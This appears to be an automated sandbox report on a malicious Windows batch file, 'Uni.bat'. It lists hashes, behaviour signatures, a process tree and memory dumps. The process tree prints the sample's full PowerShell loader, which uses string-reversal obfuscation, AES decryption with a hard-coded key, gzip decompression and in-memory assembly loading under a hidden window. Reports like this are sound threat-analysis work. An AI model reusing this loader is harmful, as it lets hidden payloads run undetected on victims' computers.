Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240611-en
  • resource tags

    arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system
  • submitted
    01-07-2024 16:35

General

  • Target

    Uni.bat

  • Size

    586KB

  • MD5

    3a43120a8dd1e42ff894670710bd8bc4

  • SHA1

    dbb9244231da204517f5d7a0e5ca713b64a3c175

  • SHA256

    b3db27588a80527cb09b85476ed59ce698dc9a4b6b03246160de944ecc5ca79d

  • SHA512

    15931135fd1fec93a3d77e0f28a19ca0780e7de34ab6a4f8174999cf534b4f810ace2bba0db3f2d0d0007199771b16d0c2bc3cdee48ef00a19be4705d3c26026

  • SSDEEP

    12288:qAtzNGPPmXaudwDKHYeRfRJUnYNY+yjOc3zRMh0KYQgrR3dih:3BsXvudwG4eR5yN6c3VS0KZ9

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:352
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OYi6jovj9grd+OhQ3Yq9CKyYEolqR3DCnwhMoiMIiic='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x758XCMTdc4jhHfAjXEAbQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $PTonT=New-Object System.IO.MemoryStream(,$param_var); $pteGk=New-Object System.IO.MemoryStream; $QeYIq=New-Object System.IO.Compression.GZipStream($PTonT, [IO.Compression.CompressionMode]::Decompress); $QeYIq.CopyTo($pteGk); $QeYIq.Dispose(); $PTonT.Dispose(); $pteGk.Dispose(); $pteGk.ToArray();}function execute_function($param_var,$param2_var){ $imxQj=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $oCBDZ=$imxQj.EntryPoint; $oCBDZ.Invoke($null, $param2_var);}$bxwFd = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat';$host.UI.RawUI.WindowTitle = $bxwFd;$spiDd=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($bxwFd).Split([Environment]::NewLine);foreach ($urTOm in $spiDd) { if ($urTOm.StartsWith('VUGwKkMvYCOpuHkPGxtm')) { $jdwUC=$urTOm.Substring(20); break; }}$payloads_var=[string[]]$jdwUC.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
      2⤵
        PID:380
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1892

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1892-4-0x000007FEF595E000-0x000007FEF595F000-memory.dmp

      Filesize

      4KB

    • memory/1892-5-0x000000001B610000-0x000000001B8F2000-memory.dmp

      Filesize

      2.9MB

    • memory/1892-6-0x0000000001E90000-0x0000000001E98000-memory.dmp

      Filesize

      32KB

    • memory/1892-8-0x000007FEF56A0000-0x000007FEF603D000-memory.dmp

      Filesize

      9.6MB

    • memory/1892-7-0x000007FEF56A0000-0x000007FEF603D000-memory.dmp

      Filesize

      9.6MB

    • memory/1892-9-0x000007FEF56A0000-0x000007FEF603D000-memory.dmp

      Filesize

      9.6MB

    • memory/1892-10-0x000007FEF595E000-0x000007FEF595F000-memory.dmp

      Filesize

      4KB